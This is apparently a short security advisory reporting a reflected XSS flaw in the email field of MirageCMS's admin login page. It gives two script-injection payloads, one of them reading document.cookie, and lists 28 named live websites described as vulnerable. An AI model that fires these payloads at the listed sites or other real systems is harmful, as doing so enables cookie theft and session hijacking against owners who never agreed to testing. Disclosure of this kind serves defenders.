MirageCMS (Content Management System) - Reflected XSS.

2016.10.29
Risk: Low
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-79

Overview - All the versions of MirageCMS are vulnerable to a reflected XSS, The attacker can inject JavaScript to email parameter in a login page. More than 28 websites are vulnerable. POC - www.miragecms.com/admin/login "><script>alert(1);</script> "><script>alert(document.cookie);</script> all the vulnerable websites: 1. http://www.stgweb.com 2. http://www.perot4u.co.il 3. http://www.svsystems.co.il 4. http://www.mertens-hoffman.co.il 5. http://www.discreet-f.co.il 6. http://www.justeyefashion.com 7. http://www.daniel-matat.co.il 8. http://www.the-d.co.il 9. https://www.kozicorporatehousing.com 10. http://www.control-towers.com 11. http://www.tikrot.co.il 12. http://www.talimbar.com 13. http://www.polyron.co.il 14. http://www.hezidean.co.il 15. http://www.udishor.com 16. http://www.mayevsky.co.il 17. http://www.veksler.co.il 18. http://www.egm.co.il 19. http://www.etgar-siud.com 20. http://www.tel-raz.co.il 21. http://www.nuritbublil.co.il 22. http://www.3access.net 23. http://www.etgar-hr.com 24. http://www.teritory.co.il 25. http://www.teritory.co.il 26. http://www.ybendror.com 27. http://www.woops.co.il 28. http://www.portcafe.co.il


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top